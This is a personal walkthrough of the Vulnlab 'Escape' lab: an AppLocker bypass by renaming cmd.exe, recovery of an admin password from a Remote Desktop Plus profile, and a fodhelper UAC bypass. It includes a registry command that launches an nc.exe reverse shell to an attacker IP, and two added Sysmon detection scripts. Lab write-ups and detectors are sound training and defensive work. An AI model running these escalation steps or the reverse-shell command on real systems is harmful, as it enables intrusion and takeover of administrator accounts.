Here are my notes on the ESCAPE box from Vulnlab.
ESCAPE: 10.10.97.0
Kiosk Escape:
https://ppn.snovvcrash.rocks/pentest/infrastructure/kiosk-breakout
Breaking out of Windows Kiosks using only Microsoft Edge
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/
Windows:
rdesktop 10.10.97.0 -u KioskUser0
- Login without a password.
First thing: press the Windows key to get the Start menu.
CMD = NOPE, blocked by AppLocker.
Launch Edge from the Start menu as usual and browse to:
file://C:/
file://C:/Windows/System32/cmd.exe
Download cmd.exe and rename it to msedge.exe.
Run it to gain a shell.
AppLocker here only matches on the file name/path, not on the file contents or publisher, so the renamed cmd.exe is allowed to run.
C:\Users\kioskUser0\Downloads>whoami
escape\kioskuser0
C:\Users\kioskUser0\Downloads>hostname
Escape
USER-SHELL !
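The detection side of the trick above, as an added example (not part of the original notes): AppLocker path rules only see the name and location of a file, but the PE version resource still names the original binary, and Sysmon process-creation events (Event ID 1) expose that as OriginalFileName. A cmd.exe copied to Downloads\msedge.exe shows up with Image=...\msedge.exe next to OriginalFileName=Cmd.Exe, which is what this script flags. The log lines, the SID-free user names and the watchlist of original file names are constructed for the example and are not telemetry from the box.

```python
"""Spot renamed LOLBins in Sysmon process-creation events.

Added example for these notes, not code from the original write-up.
AppLocker path rules only see where a file lives and what it is called,
but the PE version resource still names the original binary, and Sysmon
Event ID 1 surfaces that as OriginalFileName. A cmd.exe copied to
Downloads\\msedge.exe therefore shows Image=...\\msedge.exe next to
OriginalFileName=Cmd.Exe, which is the signal checked here.
"""
import re

# Constructed, simplified Sysmon Event ID 1/3 lines as key=value pairs; they
# are not real telemetry from the box. The second line is the renamed cmd.exe.
SAMPLE_EVENTS = [
    "EventID=1 Image=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe "
    "OriginalFileName=msedge.exe User=ESCAPE\\kioskUser0",
    "EventID=1 Image=C:\\Users\\kioskUser0\\Downloads\\msedge.exe "
    "OriginalFileName=Cmd.Exe User=ESCAPE\\kioskUser0",
    "EventID=1 Image=C:\\Windows\\System32\\whoami.exe "
    "OriginalFileName=whoami.exe User=ESCAPE\\kioskUser0",
    "EventID=3 Image=C:\\Windows\\System32\\svchost.exe "
    "OriginalFileName=svchost.exe User=NT AUTHORITY\\SYSTEM",
]

# Split on a space only when the next token looks like a new key=, so values
# containing spaces ("Program Files (x86)", "NT AUTHORITY") stay intact.
KV_SPLIT = re.compile(r" (?=[A-Za-z]+=)")

# Original file names of shells and interpreters that should never run under a
# different image name. Watchlist constructed for the example.
WATCHED_ORIGINALS = {
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe",
}


def parse_event(line: str) -> dict:
    """Parse one 'k=v k=v ...' line into a dict; values may contain spaces."""
    fields = {}
    for token in KV_SPLIT.split(line.strip()):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def is_renamed_binary(event: dict) -> bool:
    """True when a watched binary was launched under another file name."""
    if event.get("EventID") != "1":
        return False
    image_name = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    return original in WATCHED_ORIGINALS and image_name != original


def find_renamed(lines):
    """Return (image, original_file_name, user) for every suspicious launch."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_renamed_binary(event):
            hits.append((event["Image"], event["OriginalFileName"], event.get("User", "")))
    return hits


if __name__ == "__main__":
    for image, original, user in find_renamed(SAMPLE_EVENTS):
        print(f"renamed binary: {image} is really {original} (run by {user})")
```

Only the Downloads\msedge.exe launch is reported; the real Edge, whoami.exe and the Event ID 3 line pass. On the policy side, an AppLocker rule that pins the allowed binary's publisher and product name, or its hash, rather than its path would have refused the renamed cmd.exe outright.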
PS C:\Users\kioskUser0\Desktop> whoami
escape\kioskuser0
PS C:\Users\kioskUser0\Desktop> hostname
Escape
PS C:\Users\kioskUser0\Desktop> dir
Directory: C:\Users\kioskUser0\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/3/2024 3:47 AM 2352 Microsoft Edge.lnk
-a---- 2/3/2024 3:48 AM 36 user_07eb46.txt
PS C:\Users\kioskUser0\Desktop> type user_07eb46.txt
VL{[REDIRECTED]}
USER.TXT: VL{[REDIRECTED]}
PRIV ESC:
kioskuser0 -> admin (medium integrity).
Discovered C:\_admin\profiles.xml
C:\_admin>type profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
<Secure>False</Secure>
</Profile>
</Data>
Remote Desktop Plus is installed, so let's import this profile.
The admin profile is there, with its password shown as bullets like ****.
BulletsPassView NOTES:
https://www.nirsoft.net/utils/bullets_password_view.html
https://www.nirsoft.net/utils/bulletspassview.zip
https://www.nirsoft.net/utils/bulletspassview-x64.zip
Load BulletsPassView.exe (64-Bit Version) first.
Import profiles.xml into rdp.exe
Click Edit and you will see the bulleted password.
Switch back to BulletsPassView, click Refresh, and the password is shown in clear text.
admin:[REDIRECTED]
https://aditya-3.gitbook.io/oscp/readme/walkthroughs/vuln-lab/escape-vulnlab
vulnlab-escape
https://bushidosan.com/posts/vl-escape/
runas /user:admin "cmd.exe"
C:\Windows\system32>whoami
escape\admin
C:\Windows\system32>hostname
Escape
admin shell !
We get an admin shell (admin is a member of the Administrators group), but it runs at medium integrity, so a UAC bypass is needed as usual.
Import-Module .\FodhelperBypass.ps1
FodhelperBypass - launches PowerShell at high integrity.
HIGH ADMIN PRIV SHELL !
PS C:\users\Administrator\Desktop> whoami
escape\admin
PS C:\users\Administrator\Desktop> hostname
Escape
PS C:\users\Administrator\Desktop> dir
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/3/2024 9:07 AM 2332 Microsoft Edge.lnk
-a---- 2/3/2024 3:48 AM 36 root.txt
PS C:\users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Different Ways to do UAC Bypass:
start-process cmd.exe -verb runas
Start-Process powershell -verb runAs
# This only works if you know an administrator password and are in an interactive GUI/RDP session, since it just triggers the UAC consent prompt.
UAC-BYPASS Reverse-Shell:
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Users\admin\Desktop\nc.exe 10.8.2.138 9001 -e powershell.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
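How the FodhelperBypass.ps1 step and the registry commands above look from the blue-team side, as an added example that is not part of the original notes: the bypass plants a per-user handler under HKCU\Software\Classes\ms-settings\Shell\Open\command and then starts fodhelper.exe, an auto-elevating Microsoft binary that honours it. Sysmon records the value writes as Event ID 13 (HKCU appears as HKU\<SID> in TargetObject) and the launch as Event ID 1, so this script correlates a handler write followed shortly by a fodhelper.exe start. The event lines, the SID, the timestamps and the payload path are constructed for the example.

```python
"""Correlate the fodhelper UAC-bypass pattern in Sysmon events.

Added example for these notes, not code from the original write-up. The
bypass first writes HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command
(an empty DelegateExecute plus the command in the default value) and then
starts fodhelper.exe, which auto-elevates and honours that handler. Sysmon
records the writes as Event ID 13 (HKCU shows up as HKU\\<SID>) and the
launch as Event ID 1, so a write followed shortly by a launch is the
pattern matched here.
"""
import re
from datetime import datetime, timedelta

KV_SPLIT = re.compile(r" (?=[A-Za-z]+=)")
MS_SETTINGS_HANDLER = re.compile(
    r"\\software\\classes\\ms-settings\\shell\\open\\command(\\|$)", re.IGNORECASE
)
WINDOW = timedelta(minutes=5)  # how long after the write a launch still counts

# Constructed events; the SID, timestamps, payload path and millisecond-free
# UtcTime format are simplifications, not real telemetry from the box.
SAMPLE_EVENTS = [
    "UtcTime=2024-02-03 09:00:01 EventID=13 "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "TargetObject=HKU\\S-1-5-21-111-222-333-1001\\Software\\Classes\\ms-settings"
    "\\Shell\\Open\\command\\DelegateExecute Details=(Empty)",
    "UtcTime=2024-02-03 09:00:01 EventID=13 "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "TargetObject=HKU\\S-1-5-21-111-222-333-1001\\Software\\Classes\\ms-settings"
    "\\Shell\\Open\\command\\(Default) Details=C:\\path\\to\\payload.exe",
    "UtcTime=2024-02-03 09:00:03 EventID=1 Image=C:\\Windows\\System32\\fodhelper.exe "
    "IntegrityLevel=High ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    # A user opening Optional Features half an hour later: no preceding write.
    "UtcTime=2024-02-03 09:30:00 EventID=1 Image=C:\\Windows\\System32\\fodhelper.exe "
    "IntegrityLevel=High ParentImage=C:\\Windows\\explorer.exe",
]


def parse_event(line: str) -> dict:
    """Parse one 'k=v k=v ...' line; values may contain spaces."""
    fields = {}
    for token in KV_SPLIT.split(line.strip()):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def event_time(event: dict) -> datetime:
    """UtcTime of an event as a datetime (constructed format, no milliseconds)."""
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S")


def handler_writes(events):
    """Event ID 13 writes under a per-user ms-settings shell handler key."""
    return [
        e for e in events
        if e.get("EventID") == "13" and MS_SETTINGS_HANDLER.search(e.get("TargetObject", ""))
    ]


def detect_fodhelper_bypass(lines):
    """One alert per fodhelper.exe launch preceded by a handler write within
    WINDOW; each alert lists the writes that primed it."""
    events = [parse_event(line) for line in lines]
    writes = handler_writes(events)
    alerts = []
    for e in events:
        if e.get("EventID") != "1":
            continue
        if e.get("Image", "").rsplit("\\", 1)[-1].lower() != "fodhelper.exe":
            continue
        launched = event_time(e)
        primed = [w for w in writes if timedelta(0) <= launched - event_time(w) <= WINDOW]
        if primed:
            alerts.append({
                "launch_time": e["UtcTime"],
                "parent": e.get("ParentImage", ""),
                "writes": [w["TargetObject"] for w in primed],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_fodhelper_bypass(SAMPLE_EVENTS):
        print(f"{alert['launch_time']} fodhelper.exe from {alert['parent']} "
              f"after {len(alert['writes'])} ms-settings handler write(s)")
```

The 09:00:03 launch is alerted with both registry writes attached; the 09:30 launch from explorer.exe is not, because nothing primed the handler key before it. The writes alone are also worth a lower-severity alert, since legitimate software has little reason to register a per-user ms-settings handler. Setting UAC to "Always notify" removes the silent auto-elevation that fodhelper.exe relies on, which is the configuration fix for this whole class of bypass.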